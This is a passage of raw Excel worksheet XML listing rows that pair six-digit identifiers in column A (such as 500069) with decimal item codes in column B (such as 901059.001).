      <c r="B1679" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1680" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1680" s="5">
        <v>500103</v>
      </c>
      <c r="B1680" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1681" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1681" s="5">
        <v>500103</v>
      </c>
      <c r="B1681" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1682" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1682" s="5">
        <v>500021</v>
      </c>
      <c r="B1682" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1683" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1683" s="5">
        <v>500021</v>
      </c>
      <c r="B1683" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1684" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1684" s="5">
        <v>500021</v>
      </c>
      <c r="B1684" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1685" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1685" s="5">
        <v>500021</v>
      </c>
      <c r="B1685" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="1686" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1686" s="5">
        <v>500021</v>
      </c>
      <c r="B1686" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="1687" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1687" s="5">
        <v>500021</v>
      </c>
      <c r="B1687" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1688" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1688" s="5">
        <v>500021</v>
      </c>
      <c r="B1688" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1689" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1689" s="5">
        <v>500021</v>
      </c>
      <c r="B1689" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1690" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1690" s="5">
        <v>500021</v>
      </c>
      <c r="B1690" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1691" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1691" s="5">
        <v>500021</v>
      </c>
      <c r="B1691" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1692" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1692" s="5">
        <v>500021</v>
      </c>
      <c r="B1692" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1693" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1693" s="5">
        <v>500021</v>
      </c>
      <c r="B1693" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1694" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1694" s="5">
        <v>500021</v>
      </c>
      <c r="B1694" s="3">
        <v>901218.00699999998</v>
      </c>
    </row>
    <row r="1695" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1695" s="5">
        <v>500021</v>
      </c>
      <c r="B1695" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="1696" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1696" s="5">
        <v>500021</v>
      </c>
      <c r="B1696" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1697" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1697" s="5">
        <v>500021</v>
      </c>
      <c r="B1697" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1698" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1698" s="5">
        <v>500069</v>
      </c>
      <c r="B1698" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="1699" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1699" s="5">
        <v>500069</v>
      </c>
      <c r="B1699" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="1700" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1700" s="5">
        <v>500069</v>
      </c>
      <c r="B1700" s="3">
        <v>901583.00600000005</v>
      </c>
    </row>
    <row r="1701" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1701" s="5">
        <v>500069</v>
      </c>
      <c r="B1701" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1702" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1702" s="5">
        <v>500069</v>
      </c>
      <c r="B1702" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1703" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1703" s="5">
        <v>500069</v>
      </c>
      <c r="B1703" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1704" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1704" s="5">
        <v>500069</v>
      </c>
      <c r="B1704" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1705" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1705" s="5">
        <v>500069</v>
      </c>
      <c r="B1705" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1706" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1706" s="5">
        <v>500069</v>
      </c>
      <c r="B1706" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1707" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1707" s="5">
        <v>500069</v>
      </c>
      <c r="B1707" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="1708" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1708" s="5">
        <v>500069</v>
      </c>
      <c r="B1708" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="1709" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1709" s="5">
        <v>500069</v>
      </c>
      <c r="B1709" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="1710" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1710" s="5">
        <v>500069</v>
      </c>
      <c r="B1710" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="1711" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1711" s="5">
        <v>500069</v>
      </c>
      <c r="B1711" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="1712" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1712" s="5">
        <v>500069</v>
      </c>
      <c r="B1712" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1713" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1713" s="5">
        <v>500069</v>
      </c>
      <c r="B1713" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="1714" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1714" s="5">
        <v>500069</v>
      </c>
      <c r="B1714" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="1715" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1715" s="5">
        <v>500069</v>
      </c>
      <c r="B1715" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1716" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1716" s="5">
        <v>500069</v>
      </c>
      <c r="B1716" s="3">
        <v>901589.00199999998</v>
      </c>
    </row>
    <row r="1717" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1717" s="5">
        <v>500069</v>
      </c>
      <c r="B1717" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1718" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1718" s="5">
        <v>500069</v>
      </c>
      <c r="B1718" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1719" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1719" s="5">
        <v>500069</v>
      </c>
      <c r="B1719" s="3">
        <v>901559.00100000005</v>
      </c>
    </row>
    <row r="1720" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1720" s="5">
        <v>500069</v>
      </c>
      <c r="B1720" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="1721" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1721" s="5">
        <v>500069</v>
      </c>
      <c r="B1721" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1722" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1722" s="5">
        <v>500069</v>
      </c>
      <c r="B1722" s="3">
        <v>901104</v>
      </c>
    </row>
    <row r="1723" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1723" s="5">
        <v>500069</v>
      </c>
      <c r="B1723" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1724" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1724" s="5">
        <v>500069</v>
      </c>
      <c r="B1724" s="3">
        <v>901027.00300000003</v>
      </c>
    </row>
    <row r="1725" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1725" s="5">
        <v>500069</v>
      </c>
      <c r="B1725" s="3">
        <v>901027.00399999996</v>
      </c>
    </row>
    <row r="1726" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1726" s="5">
        <v>500069</v>
      </c>
      <c r="B1726" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1727" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1727" s="5">
        <v>500069</v>
      </c>
      <c r="B1727" s="3">
        <v>901137.00100000005</v>
      </c>
    </row>
    <row r="1728" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1728" s="5">
        <v>500069</v>
      </c>
      <c r="B1728" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1729" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1729" s="5">
        <v>500069</v>
      </c>
      <c r="B1729" s="3">
        <v>901003.00399999996</v>
      </c>
    </row>
    <row r="1730" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1730" s="5">
        <v>500069</v>
      </c>
      <c r="B1730" s="3">
        <v>901003.005</v>
      </c>
    </row>
    <row r="1731" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1731" s="5">
        <v>500069</v>
      </c>
      <c r="B1731" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1732" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1732" s="5">
        <v>500069</v>
      </c>
      <c r="B1732" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1733" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1733" s="5">
        <v>500069</v>
      </c>
      <c r="B1733" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1734" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1734" s="5">
        <v>500069</v>
      </c>
      <c r="B1734" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="1735" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1735" s="5">
        <v>500069</v>
      </c>
      <c r="B1735" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="1736" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1736" s="5">
        <v>500069</v>
      </c>
      <c r="B1736" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1737" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1737" s="5">
        <v>500069</v>
      </c>
      <c r="B1737" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="1738" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1738" s="5">
        <v>500069</v>
      </c>
      <c r="B1738" s="3">
        <v>901218.00300000003</v>
      </c>
    </row>
    <row r="1739" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1739" s="5">
        <v>500069</v>
      </c>
      <c r="B1739" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="1740" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1740" s="5">
        <v>500069</v>
      </c>
      <c r="B1740" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="1741" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1741" s="5">
        <v>500069</v>
      </c>
      <c r="B1741" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="1742" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1742" s="5">
        <v>500069</v>
      </c>
      <c r="B1742" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="1743" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1743" s="5">
        <v>500069</v>
      </c>
      <c r="B1743" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1744" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1744" s="5">
        <v>500069</v>
      </c>
      <c r="B1744" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1745" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1745" s="5">
        <v>500069</v>
      </c>
      <c r="B1745" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="1746" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1746" s="5">
        <v>500069</v>
      </c>
      <c r="B1746" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="1747" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1747" s="5">
        <v>500069</v>
      </c>
      <c r="B1747" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="1748" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1748" s="5">
        <v>500069</v>
      </c>
      <c r="B1748" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1749" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1749" s="5">
        <v>500069</v>
      </c>
      <c r="B1749" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1750" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1750" s="5">
        <v>500069</v>
      </c>
      <c r="B1750" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="1751" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1751" s="5">
        <v>500069</v>
      </c>
      <c r="B1751" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1752" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1752" s="5">
        <v>500129</v>
      </c>
      <c r="B1752" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="1753" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1753" s="5">
        <v>500129</v>
      </c>
      <c r="B1753" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1754" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1754" s="5">
        <v>500129</v>
      </c>
      <c r="B1754" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1755" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1755" s="5">
        <v>500129</v>
      </c>
      <c r="B1755" s="3">
        <v>901560.00300000003</v>
      </c>
    </row>
    <row r="1756" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1756" s="5">
        <v>500129</v>
      </c>
      <c r="B1756" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="1757" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1757" s="5">
        <v>500129</v>
      </c>
      <c r="B1757" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1758" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1758" s="5">
        <v>500129</v>
      </c>
      <c r="B1758" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1759" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1759" s="5">
        <v>500129</v>
      </c>
      <c r="B1759" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1760" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1760" s="5">
        <v>500129</v>
      </c>
      <c r="B1760" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1761" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1761" s="5">
        <v>500129</v>
      </c>
      <c r="B1761" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="1762" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1762" s="5">
        <v>500129</v>
      </c>
      <c r="B1762" s="3">
        <v>901052.00100000005</v>
      </c>
    </row>
    <row r="1763" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1763" s="5">
        <v>500129</v>
      </c>
      <c r="B1763" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="1764" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1764" s="5">
        <v>500129</v>
      </c>
      <c r="B1764" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1765" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1765" s="5">
        <v>500129</v>
      </c>
      <c r="B1765" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="1766" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1766" s="5">
        <v>500129</v>
      </c>
      <c r="B1766" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="1767" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1767" s="5">
        <v>500129</v>
      </c>
      <c r="B1767" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1768" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1768" s="5">
        <v>500129</v>
      </c>
      <c r="B1768" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1769" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1769" s="5">
        <v>500129</v>
      </c>
      <c r="B1769" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1770" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1770" s="5">
        <v>500129</v>
      </c>
      <c r="B1770" s="3">
        <v>901036.00699999998</v>
      </c>
    </row>
    <row r="1771" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1771" s="5">
        <v>500129</v>
      </c>
      <c r="B1771" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1772" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1772" s="5">
        <v>500129</v>
      </c>
      <c r="B1772" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="1773" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1773" s="5">
        <v>500129</v>
      </c>
      <c r="B1773" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="1774" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1774" s="5">
        <v>500129</v>
      </c>
      <c r="B1774" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1775" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1775" s="5">
        <v>500129</v>
      </c>
      <c r="B1775" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1776" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1776" s="5">
        <v>500129</v>
      </c>
      <c r="B1776" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1777" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1777" s="5">
        <v>500129</v>
      </c>
      <c r="B1777" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="1778" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1778" s="5">
        <v>500129</v>
      </c>
      <c r="B1778" s="3">
        <v>901091</v>
      </c>
    </row>
    <row r="1779" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1779" s="5">
        <v>500129</v>
      </c>
      <c r="B1779" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1780" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1780" s="5">
        <v>500129</v>
      </c>
      <c r="B1780" s="3">
        <v>901218.00399999996</v>
      </c>
    </row>
    <row r="1781" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1781" s="5">
        <v>500129</v>
      </c>
      <c r="B1781" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="1782" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1782" s="5">
        <v>500129</v>
      </c>
      <c r="B1782" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="1783" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1783" s="5">
        <v>500129</v>
      </c>
      <c r="B1783" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1784" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1784" s="5">
        <v>500129</v>
      </c>
      <c r="B1784" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1785" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1785" s="5">
        <v>500129</v>
      </c>
      <c r="B1785" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="1786" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1786" s="5">
        <v>500129</v>
      </c>
      <c r="B1786" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1787" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1787" s="5">
        <v>500129</v>
      </c>
      <c r="B1787" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1788" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1788" s="5">
        <v>500129</v>
      </c>
      <c r="B1788" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1789" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1789" s="5">
        <v>500019</v>
      </c>
      <c r="B1789" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1790" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1790" s="5">
        <v>500019</v>
      </c>
      <c r="B1790" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="1791" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1791" s="5">
        <v>500019</v>
      </c>
      <c r="B1791" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="1792" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1792" s="5">
        <v>500019</v>
      </c>
      <c r="B1792" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1793" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1793" s="5">
        <v>500019</v>
      </c>
      <c r="B1793" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="1794" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1794" s="5">
        <v>500019</v>
      </c>
      <c r="B1794" s="3">
        <v>901137.00600000005</v>
      </c>
    </row>
    <row r="1795" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1795" s="5">
        <v>500019</v>
      </c>
      <c r="B1795" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1796" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1796" s="5">
        <v>500019</v>
      </c>
      <c r="B1796" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1797" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1797" s="5">
        <v>500019</v>
      </c>
      <c r="B1797" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1798" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1798" s="5">
        <v>500019</v>
      </c>
      <c r="B1798" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="1799" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1799" s="5">
        <v>500019</v>
      </c>
      <c r="B1799" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1800" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1800" s="5">
        <v>500019</v>
      </c>
      <c r="B1800" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1801" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1801" s="5">
        <v>500019</v>
      </c>
      <c r="B1801" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="1802" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1802" s="5">
        <v>500019</v>
      </c>
      <c r="B1802" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1803" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1803" s="5">
        <v>500014</v>
      </c>
      <c r="B1803" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1804" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1804" s="5">
        <v>500014</v>
      </c>
      <c r="B1804" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="1805" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1805" s="5">
        <v>500014</v>
      </c>
      <c r="B1805" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
    <row r="1806" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1806" s="5">
        <v>500014</v>
      </c>
      <c r="B1806" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="1807" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1807" s="5">
        <v>500014</v>
      </c>
      <c r="B1807" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="1808" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1808" s="5">
        <v>500014</v>
      </c>
      <c r="B1808" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1809" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1809" s="5">
        <v>500014</v>
      </c>
      <c r="B1809" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1810" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1810" s="5">
        <v>500014</v>
      </c>
      <c r="B1810" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="1811" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1811" s="5">
        <v>500014</v>
      </c>
      <c r="B1811" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1812" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1812" s="5">
        <v>500014</v>
      </c>
      <c r="B1812" s="3">
        <v>901003.00199999998</v>
      </c>
    </row>
    <row r="1813" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1813" s="5">
        <v>500014</v>
      </c>
      <c r="B1813" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1814" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1814" s="5">
        <v>500014</v>
      </c>
      <c r="B1814" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="1815" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1815" s="5">
        <v>500014</v>
      </c>
      <c r="B1815" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="1816" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1816" s="5">
        <v>500014</v>
      </c>
      <c r="B1816" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1817" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1817" s="5">
        <v>500014</v>
      </c>
      <c r="B1817" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1818" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1818" s="5">
        <v>500133</v>
      </c>
      <c r="B1818" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1819" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1819" s="5">
        <v>500133</v>
      </c>
      <c r="B1819" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1820" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1820" s="5">
        <v>500133</v>
      </c>
      <c r="B1820" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="1821" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1821" s="5">
        <v>500133</v>
      </c>
      <c r="B1821" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1822" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1822" s="5">
        <v>500133</v>
      </c>
      <c r="B1822" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="1823" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1823" s="5">
        <v>500133</v>
      </c>
      <c r="B1823" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1824" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1824" s="5">
        <v>500133</v>
      </c>
      <c r="B1824" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1825" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1825" s="5">
        <v>500049</v>
      </c>
      <c r="B1825" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="1826" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1826" s="5">
        <v>500049</v>
      </c>
      <c r="B1826" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="1827" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1827" s="5">
        <v>500049</v>
      </c>
      <c r="B1827" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1828" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1828" s="5">
        <v>500049</v>
      </c>
      <c r="B1828" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="1829" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1829" s="5">
        <v>500049</v>
      </c>
      <c r="B1829" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="1830" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1830" s="5">
        <v>500049</v>
      </c>
      <c r="B1830" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="1831" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1831" s="5">
        <v>500049</v>
      </c>
      <c r="B1831" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="1832" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1832" s="5">
        <v>500049</v>
      </c>
      <c r="B1832" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1833" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1833" s="5">
        <v>500049</v>
      </c>
      <c r="B1833" s="3">
        <v>901059.00300000003</v>
